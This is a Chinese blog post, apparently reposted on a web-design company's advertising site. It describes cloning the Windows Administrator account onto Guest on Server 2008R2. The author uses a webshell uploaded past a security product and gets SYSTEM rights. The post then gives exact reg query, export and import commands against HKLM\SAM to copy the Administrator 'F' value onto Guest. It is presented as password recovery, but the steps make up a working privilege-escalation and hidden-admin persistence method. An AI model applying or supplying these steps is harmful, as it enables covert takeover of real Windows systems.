半夜Server 2008R2安裝MS17-010補丁時，重啟系統(tǒng) 發(fā)現(xiàn)系統(tǒng)密碼忘記了
還好本地登錄的安全策略留了一個guest用戶
本地搭建了DVWA WEB***測試環(huán)境 權限為system
通過漏洞上傳過狗一句話***
***權限為system權限
可以創(chuàng)建用戶 但是無法將用戶添加至管理員組 估計是安全狗攔截了提權操作
隨后將管理員權限克隆至login用戶 登錄成功

創(chuàng)新互聯(lián)堅持“要么做到，要么別承諾”的工作理念，服務領域包括：網站設計制作、網站建設、企業(yè)官網、英文網站、手機端網站、網站推廣等服務，滿足客戶于互聯(lián)網時代的仁壽網站設計、移動媒體設計的需求，幫助企業(yè)找到有效的互聯(lián)網解決方案。努力成為您成熟可靠的網絡建設合作伙伴！

目標將把Guest提權為Administrator
查詢SAM注冊表下有什么配置文件
Reg query HKLM\SAM\SAM\Domains\Account\Users

查詢用戶名
Reg query HKLM\SAM\SAM\Domains\Account\Users\Names

000001F4的配置文件對應的用戶為Administrator
000001F5的配置文件對應的用戶為Guest
然后把注冊表下的鍵值導出
先把Administrator的鍵值導出 保存到C盤名稱為1.reg
Reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1.reg
再把Guest的鍵值導出 保存到C盤名稱為2.reg
Reg export HKLM\SAM\SAM\Domains\Account\Users\000001F5 c:\2.reg

然后將1.reg “F”的鍵值數(shù)據(jù)復制下來 替換2.reg里面的”F”鍵值

然后在把2.reg導入到注冊表
Reg import c:\2.reg
最后使用guest登錄
用戶家目錄等 都變成了Administrator的數(shù)據(jù)
實際上就是Administrator=Guest

新聞標題：記一次克隆管理員的經歷
網站鏈接：http://aaarwkj.com/article30/gjgepo.html

成都網站建設公司_創(chuàng)新互聯(lián)，為您提供品牌網站設計、動態(tài)網站、手機網站建設、云服務器、企業(yè)建站、服務器托管

廣告

聲明：本網站發(fā)布的內容（圖片、視頻和文字）以用戶投稿、用戶轉載內容為主，如果涉及侵權請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內容未經允許不得轉載，或轉載時需注明來源： 創(chuàng)新互聯(lián)